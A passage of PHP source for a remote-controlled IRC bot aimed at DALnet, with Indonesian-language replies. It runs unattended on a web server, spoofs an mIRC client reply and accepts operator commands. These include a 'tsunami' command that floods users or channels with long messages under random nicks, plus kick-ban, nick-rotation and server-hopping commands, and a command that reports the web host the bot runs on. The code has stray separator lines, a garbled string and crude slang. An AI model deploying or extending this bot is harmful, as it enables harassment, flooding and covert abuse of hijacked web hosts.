$dayload = date("H:i:s d/m/Y");
|
||||||
|
ini_set('user_agent','MSIE 5\.5;');
|
||||||
|
set_time_limit(0);
|
||||||
|
define ('CRL', "\r\n");
|
||||||
|
$channels = strtolower($channels)." ";
|
||||||
|
$channel = explode(" ", $channels);
|
||||||
|
|
||||||
|
do {
|
||||||
|
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30);
|
||||||
|
if(!$fp) {
|
||||||
|
if ( $counterfp <= 200 ) {
|
||||||
|
$counterfp = $counterfp+1;
|
||||||
|
working($nick);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
print "<br><b>Cannot connect to $remotehost!<br>Please Try Another Server!</b>";
|
||||||
|
$keluar = 1;
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
print "<br><b>== Suceeded connection</b>";
|
||||||
|
$Header = 'NICK '.$nick . CRL;
|
||||||
|
$Header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
|
||||||
|
fputs($fp, $Header);
|
||||||
|
$response = '';
|
||||||
|
while (!feof($fp)) {
|
||||||
|
$response .= fgets($fp, 1024);
|
||||||
|
while (substr_count($response,CRL) != 0) {
|
||||||
|
$offset = strpos($response, CRL);
|
||||||
|
$data = substr($response,0,$offset);
|
||||||
|
$response = substr($response,$offset+2);
|
||||||
|
if (substr($data,0,1) == ':') {
|
||||||
|
$offsetA = strpos($data, ' ');
|
||||||
|
$dFrom = substr($data,1,$offsetA-1);
|
||||||
|
$offsetB = strpos($data, ' :');
|
||||||
|
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
|
||||||
|
$offsetC = strpos($data, '!');
|
||||||
|
$dNick = substr($data,1,$offsetC-1);
|
||||||
|
$iText = substr($data,$offsetB+2);
|
||||||
|
if ( substr($dCommand,0,3) == '004' ) {
|
||||||
|
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
|
||||||
|
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
|
||||||
|
fputs($fp, 'NOTICE ' . $Admin . ' :Halo bos besar!' . CRL);
|
||||||
|
foreach ($channel as $v) {
|
||||||
|
fputs($fp, 'JOIN ' .$v . CRL);
|
||||||
|
}
|
||||||
|
$pong1 = '1';
|
||||||
|
}
|
||||||
|
elseif (substr($dCommand,0,3)=='465') {
|
||||||
|
print "<br><b>== This bot have been autokilled.</b>";
|
||||||
|
$akill = 2;
|
||||||
|
}
|
||||||
|
elseif (substr($dCommand,0,3)=='433') {
|
||||||
|
$nick = $nicky[rand(0,count($nicky) - 1)];
|
||||||
|
fputs($fp, 'NICK '.$nick . CRL);
|
||||||
|
}
|
||||||
|
elseif (substr($dCommand,0,3)=='432') {
|
||||||
|
$nick = $nick.$username;
|
||||||
|
fputs($fp, 'NICK '.$nick . CRL);
|
||||||
|
}
|
||||||
|
if (eregi('.dal.net',$dNick) && $akill==2) {
|
||||||
|
if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) {
|
||||||
|
print "<br><b>".strstr($data,'***')." </b>";
|
||||||
|
if (eregi('Your IP is',$data)) {
|
||||||
|
$keluar = 1;
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$dcom = explode(" ", $dCommand);
|
||||||
|
$dNick = strtolower($dNick);
|
||||||
|
if ($dcom[0]=='KICK' && $dcom[2]==$nick) {
|
||||||
|
fputs($fp, 'JOIN ' .$dcom[1]. CRL);
|
||||||
|
}
|
||||||
|
elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') {
|
||||||
|
if ($auth["$dNick"]) {
|
||||||
|
if ($auth["$dNick"]["pass"]) {
|
||||||
|
if ($auth["$dNick"]["auth"]==2) {
|
||||||
|
|
||||||
|
if ($dcom[0]=='NICK') {
|
||||||
|
$com = explode(" ", $data);
|
||||||
|
$chnick = strtolower(str_replace(':','',$com[2]));
|
||||||
|
if ($dNick!=$chnick) {
|
||||||
|
$auth["$dNick"]["auth"] = 1;
|
||||||
|
fputs($fp,'NOTICE '.$chnick.' :selamat istirahat bos! ' . CRL);
|
||||||
|
}
|
||||||
|
} else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :selamat istirahat bos! ' . CRL); }
|
||||||
|
}
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); }
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) {
|
||||||
|
$dcom[2] = strtolower($dcom[2]);
|
||||||
|
if ($auth["$dcom[2]"]) {
|
||||||
|
if ($auth["$dcom[2]"]["pass"]) {
|
||||||
|
if ($auth["$dcom[2]"]["auth"]==1) {
|
||||||
|
$auth["$dcom[2]"]["auth"] = 2; $whois = "";
|
||||||
|
fputs($fp,'NOTICE ' . $dcom[2] . ' :kamu masukan password as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL);
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :password oke bos aChOnGs seep emuach di titid! ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
|
||||||
|
}
|
||||||
|
elseif ($dcom[0]=='NOTICE') {
|
||||||
|
$com = explode(" ", $data);
|
||||||
|
if ($com[3]==':_KB' && $com[4] && $com[5] && $com[6]) {
|
||||||
|
$msg = str_replace('_','',$data);
|
||||||
|
$msg = strstr($msg,":KB");
|
||||||
|
$msg = str_replace(":KB $com[4]","",$msg);
|
||||||
|
fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL);
|
||||||
|
fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif ($dcom[0]=='PRIVMSG') {
|
||||||
|
$com = explode(" ", $data);
|
||||||
|
if ($com[3]==':_VERSION_') {
|
||||||
|
fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION mIRC v6.16 Khaled Mardam-Bey'.chr(1) . CRL);
|
||||||
|
}
|
||||||
|
elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) {
|
||||||
|
if ($auth["$dNick"]) {
|
||||||
|
if ($auth["$dNick"]["pass"]) {
|
||||||
|
if ($auth["$dNick"]["auth"]==1) {
|
||||||
|
if ($com[4]===$auth["$dNick"]["pass"]) {
|
||||||
|
$auth["$dNick"]["auth"] = 2;
|
||||||
|
fputs($fp,'NOTICE ' . $dNick . ' :kamu masukkan password as '.$auth["$dNick"]["status"].' of this bot! ' . CRL);
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :passworde salah syu! Auth salah Shu! ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :password bener bos aChOnGs emang oke! ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
|
||||||
|
}
|
||||||
|
elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') {
|
||||||
|
if ($auth["$dNick"]) {
|
||||||
|
if ($auth["$dNick"]["pass"]) {
|
||||||
|
if ($auth["$dNick"]["auth"]==2) {
|
||||||
|
$auth["$dNick"]["auth"] = 1;
|
||||||
|
fputs($fp,'NOTICE ' . $dNick . ' :You`re LogOut! ' . CRL);
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :You`re Already LogOut! ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
|
||||||
|
}
|
||||||
|
elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) {
|
||||||
|
|
||||||
|
if ($auth["$dNick"]) {
|
||||||
|
if (!$auth["$dNick"]["pass"]) {
|
||||||
|
$auth["$dNick"]["pass"] = $com[4];
|
||||||
|
$auth["$dNick"]["auth"] = 1;
|
||||||
|
fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Already Set! Type: auth <your pass> To Get Authorized ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
|
||||||
|
}
|
||||||
|
elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) {
|
||||||
|
if ($auth["$dNick"]) {
|
||||||
|
if ($auth["$dNick"]["auth"]==2) {
|
||||||
|
if ($com[4]===$auth["$dNick"]["pass"]) {
|
||||||
|
$auth["$dNick"]["pass"] = $com[5];
|
||||||
|
fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass <old pass> <new pass> To Change Your Auth Pass ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
|
||||||
|
}
|
||||||
|
elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) {
|
||||||
|
$com[4] = strtolower($com[4]);
|
||||||
|
if ($auth["$dNick"]["auth"]==2) {
|
||||||
|
if ($auth["$dNick"]["status"]=="Admin") {
|
||||||
|
if ($com[5]=="master" || $com[5]=="user") {
|
||||||
|
$auth["$com[4]"]["name"] = $com[4];
|
||||||
|
$auth["$com[4]"]["status"] = $com[5];
|
||||||
|
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
|
||||||
|
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass> To Set Your Pass ' . CRL);
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :salah Command! Type: adduser <nick> <master/user> ' . CRL); }
|
||||||
|
} elseif ($auth["$dNick"]["status"]=="master") {
|
||||||
|
if (!$auth["$com[4]"]) {
|
||||||
|
if ($com[5]=="user") {
|
||||||
|
$auth["$com[4]"]["name"] = $com[4];
|
||||||
|
$auth["$com[4]"]["status"] = $com[5];
|
||||||
|
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
|
||||||
|
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass33] <Spyderur Pass ' . CRL);
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: adduser <nick> user ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
|
||||||
|
}
|
||||||
|
elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) {
|
||||||
|
$com[4] = strtolower($com[4]);
|
||||||
|
if ($auth["$dNick"]["auth"]==2) {
|
||||||
|
if ($auth["$dNick"]["status"]=="Admin") {
|
||||||
|
if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") {
|
||||||
|
unset($auth["$com[4]"]);
|
||||||
|
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
|
||||||
|
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
|
||||||
|
} elseif ($auth["$dNick"]["status"]=="master") {
|
||||||
|
if ($auth["$com[4]"]["status"]=="user") {
|
||||||
|
unset($auth["$com[4]"]);
|
||||||
|
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
|
||||||
|
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
|
||||||
|
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
|
||||||
|
}
|
||||||
|
elseif ($auth["$dNick"]["status"]) {
|
||||||
|
if (ereg(":`",$com[3]) || ereg(":!",$com[3])) {
|
||||||
|
$chan = strstr($dCommand,"#");
|
||||||
|
$anick = str_replace("PRIVMSG ","",$dCommand);
|
||||||
|
if ($com[3]==':!auth') {
|
||||||
|
if ($auth["$dNick"]["auth"]==2) {
|
||||||
|
fputs($fp,'NOTICE '.$dNick.' :Jembutz..! You`re already Authorized!' . CRL);
|
||||||
|
} else {
|
||||||
|
$whois = $dNick;
|
||||||
|
fputs($fp,'WHOIS '.$dNick . CRL);
|
||||||
|
}
|
||||||
|
} elseif ($com[3]==':`auth' && $chan) {
|
||||||
|
if ($auth["$dNick"]["auth"]==2) {
|
||||||
|
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Hamba siap mencari janda Bos!' . CRL);
|
||||||
|
} else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Raimu bukan bosku cok!' . CRL); }
|
||||||
|
} elseif ($auth["$dNick"]["auth"]==2) {
|
||||||
|
if ($com[3]==':`say' && $com[4] && $chan) {
|
||||||
|
$msg = strstr($data,":`say");
|
||||||
|
$msg = str_replace(":`say ","",$msg);
|
||||||
|
fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`act' && $com[4] && $chan) {
|
||||||
|
$msg = strstr($data,":`act");
|
||||||
|
$msg = str_replace(":`act ","",$msg);
|
||||||
|
fputs($fp,'PRIVMSG '.$chan.' :_ACTION '.$msg.'_'. CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`slap' && $com[4] && $chan) {
|
||||||
|
fputs($fp,'PRIVMSG '.$chan.' :_ACTION slaps '.$com[4].' Jembut Raimu wani karo bosku around a bit with a large trout_'. CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`msg' && $com[4] && $com[5]) {
|
||||||
|
$msg = strstr($data,":`msg");
|
||||||
|
$msg = str_replace(":`msg $com[4] ","",$msg);
|
||||||
|
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`notice' && $com[4] && $com[5]) {
|
||||||
|
$msg = strstr($data,":`notice");
|
||||||
|
$msg = str_replace(":`notice $com[4] ","",$msg);
|
||||||
|
fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) {
|
||||||
|
$msg = strstr($data,":`ctcp");
|
||||||
|
$msg = str_replace(":`ctcp $com[4] ","",$msg);
|
||||||
|
fputs($fp,'PRIVMSG '.$com[4].' :_'.$msg.'_'. CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`ping' && $chan) {
|
||||||
|
$sml = $smile[rand(0,count($smile) - 1)];
|
||||||
|
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PONG!_ '.$sml. CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`pong' && $chan) {
|
||||||
|
$sml = $smile[rand(0,count($smile) - 1)];
|
||||||
|
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PING!_ '.$sml. CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") {
|
||||||
|
$bhost = $_SERVER['HTTP_HOST'];
|
||||||
|
$bphp = $_SERVER['PHP_SELF'];
|
||||||
|
fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`up' && $chan) {
|
||||||
|
fputs($fp, 'PRIVMSG chanserv@services.dal.net :op '.$chan.' '.$nick . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`down' && $chan) {
|
||||||
|
fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") {
|
||||||
|
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
|
||||||
|
fputs($fp, 'NICK '.$nicktsu . CRL);
|
||||||
|
if (substr($dCommand,0,3)=='433') {
|
||||||
|
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
|
||||||
|
fputs($fp, 'NICK '.$nicktsu . CRL);
|
||||||
|
}
|
||||||
|
$msg = strstr($data,":`tsunami");
|
||||||
|
$msg = str_replace(":`tsunami $com[4]","",$msg);
|
||||||
|
if (ereg("#", $com[4])) {
|
||||||
|
fputs($fp, 'JOIN '.$com[4] . CRL);
|
||||||
|
}
|
||||||
|
fputs($fp, 'PRIVMSG '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
|
||||||
|
fputs($fp, 'NOTICE '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
|
||||||
|
fputs($fp, 'PRIVMSG '.$com[4].' :_TSUNAMI _'.$msg.'_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
|
||||||
|
fputs($fp, 'PRIVMSG '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
|
||||||
|
fputs($fp, 'NOTICE '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
|
||||||
|
fputs($fp, 'PRIVMSG '.$com[4].' :_FLOOD _'.$msg.'_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
|
||||||
|
if (ereg("#", $com[4])) {
|
||||||
|
fputs($fp, 'PART '.$com[4].' :Complete' . CRL);
|
||||||
|
fputs($fp, 'NICK '.$nick . CRL);
|
||||||
|
} else {
|
||||||
|
fputs($fp, 'NICK '.$nick . CRL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") {
|
||||||
|
$msg = strstr($data,":`cycle");
|
||||||
|
if (ereg("#", $com[4])) {
|
||||||
|
$partchan = $com[4];
|
||||||
|
$msg = str_replace(":`cycle $com[4]","",$msg);
|
||||||
|
} else {
|
||||||
|
$partchan = $chan;
|
||||||
|
$msg = str_replace(":`cycle","",$msg);
|
||||||
|
}
|
||||||
|
if (strlen($msg)<3) {
|
||||||
|
$msg = '';
|
||||||
|
}
|
||||||
|
fputs($fp, 'PART '.$partchan.' :_'.$msg . CRL);
|
||||||
|
fputs($fp, 'JOIN '.$partchan . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") {
|
||||||
|
$msg = strstr($data,":`part");
|
||||||
|
if (ereg("#", $com[4])) {
|
||||||
|
$partchan = $com[4];
|
||||||
|
$msg = str_replace(":`part $com[4]","",$msg);
|
||||||
|
} else {
|
||||||
|
$partchan = $chan;
|
||||||
|
$msg = str_replace(":`part","",$msg);
|
||||||
|
}
|
||||||
|
if (strlen($msg)<3) {
|
||||||
|
$msg = '';
|
||||||
|
}
|
||||||
|
fputs($fp, 'PART '.$partchan.' :_'.$msg . CRL);
|
||||||
|
$remchan = strtolower($partchan);
|
||||||
|
if (in_array($remchan, $channel)) {
|
||||||
|
$channels = str_replace("$remchan ","",$channels);
|
||||||
|
unset($channel);
|
||||||
|
$channel = explode(" ", $channels);
|
||||||
|
}
|
||||||
|
|
||||||
|
foreach ($channel as $v) {
|
||||||
|
fputs($fp, 'JOIN '.$v . CRL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") {
|
||||||
|
if (!ereg("#",$com[4])) { $com[4]="#".$com[4]; }
|
||||||
|
$addchan = strtolower($com[4]);
|
||||||
|
if (!in_array($addchan, $channel)) {
|
||||||
|
$channel[]=$addchan;
|
||||||
|
$channels.="$addchan ";
|
||||||
|
}
|
||||||
|
foreach ($channel as $v) {
|
||||||
|
sleep(rand(1,6));
|
||||||
|
fputs($fp, 'JOIN '.$v . CRL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") {
|
||||||
|
$nick = $com[4];
|
||||||
|
$identify = $com[5];
|
||||||
|
fputs($fp, 'NICK '.$nick . CRL);
|
||||||
|
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`k' && $com[4] && $chan) {
|
||||||
|
$msg = strstr($data,":`k");
|
||||||
|
$msg = str_replace(":`k $com[4]","",$msg);
|
||||||
|
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`kb' && $com[4] && $chan) {
|
||||||
|
$msg = strstr($data,":`kb");
|
||||||
|
$msg = str_replace(":`kb $com[4]","",$msg);
|
||||||
|
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
|
||||||
|
fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`ganti') {
|
||||||
|
$nick = $nicky[rand(0,count($nicky) - 1)];
|
||||||
|
fputs($fp, 'NICK '.$nick . CRL);
|
||||||
|
if (substr($dCommand,0,3)=='433') {
|
||||||
|
$nick = $nicky[rand(0,count($nicky) - 1)];
|
||||||
|
fputs($fp, 'NICK '.$nick . CRL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`op' && $chan) {
|
||||||
|
if ($com[4]) { $opnick = $com[4]; }
|
||||||
|
else { $opnick = $dNick; }
|
||||||
|
fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`deop' && $chan) {
|
||||||
|
if ($com[4]) { $opnick = $com[4]; }
|
||||||
|
else { $opnick = $dNick; }
|
||||||
|
fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`v' && $chan) {
|
||||||
|
if ($com[4]) { $vonick = $com[4]; }
|
||||||
|
else { $vonick = $dNick; }
|
||||||
|
fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`dv' && $chan) {
|
||||||
|
if ($com[4]) { $vonick = $com[4]; }
|
||||||
|
else { $vonick = $dNick; }
|
||||||
|
fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") {
|
||||||
|
$msg = strstr($data,":`awaymsg");
|
||||||
|
$msg = str_replace(":`awaymsg","",$msg);
|
||||||
|
if (strlen($msg)<3) {
|
||||||
|
$raway="on";
|
||||||
|
fputs($fp,'AWAY : ' . 'AWAY' . CRL);
|
||||||
|
} else {
|
||||||
|
$raway="off";
|
||||||
|
fputs($fp,'AWAY : ' . $msg . CRL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`mode' && $com[4] && $chan) {
|
||||||
|
fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`nickmode' && $com[4]) {
|
||||||
|
$nickmode = $com[4];
|
||||||
|
fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`chanlist') {
|
||||||
|
fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`userlist') {
|
||||||
|
$userlist="";
|
||||||
|
foreach ($auth as $user) {
|
||||||
|
if ($user["pass"]) { $pass="-pass ok"; }
|
||||||
|
else { $pass="-no pass"; }
|
||||||
|
$userlist .= $user["name"].'('.$user["status"].$pass.') ';
|
||||||
|
}
|
||||||
|
fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") {
|
||||||
|
$msg = strstr($data,":`quit");
|
||||||
|
$msg = str_replace(":`quit","",$msg);
|
||||||
|
if (strlen($msg)>3) {
|
||||||
|
$msg = str_replace(" ","_",$msg);
|
||||||
|
}
|
||||||
|
$quit1 = array("ngantor","nguantuk","sama","brb","bye_all","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart");
|
||||||
|
$quitmsg = $quit1[rand(0,count($quit1) - 1)];
|
||||||
|
fputs($fp, 'QUIT ' . $quitmsg . CRL);
|
||||||
|
$keluar = 1;
|
||||||
|
exit;
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") {
|
||||||
|
if ($com[4]) { $localhost = $com[4]; }
|
||||||
|
else { $localhost = 'localhost'; }
|
||||||
|
$keluar = 0;
|
||||||
|
fputs($fp, 'QUIT ' . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") {
|
||||||
|
if (!eregi(".dal.net",$com[4])) {
|
||||||
|
$remotehost = "irc.dal.net";
|
||||||
|
} else { $remotehost = $com[4]; }
|
||||||
|
$keluar = 0;
|
||||||
|
fputs($fp, 'QUIT changging_server' . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") {
|
||||||
|
if (!$com[4]) {
|
||||||
|
|
||||||
|
$username = $username;
|
||||||
|
} else { $username = $com[4]; }
|
||||||
|
$keluar = 0;
|
||||||
|
fputs($fp, 'QUIT ganti_ident' . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") {
|
||||||
|
if (!$com[4]) {
|
||||||
|
$realname = "--";
|
||||||
|
} else { $realname = $com[4]; }
|
||||||
|
$keluar = 0;
|
||||||
|
fputs($fp, 'QUIT ganti_fullname' . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':`topic' && $com[4] && $chan) {
|
||||||
|
$msg = strstr($data,":`topic");
|
||||||
|
$msg = str_replace(":`topic ","",$msg);
|
||||||
|
fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL);
|
||||||
|
}
|
||||||
|
elseif ($com[3]==':!help' && !$chan) {
|
||||||
|
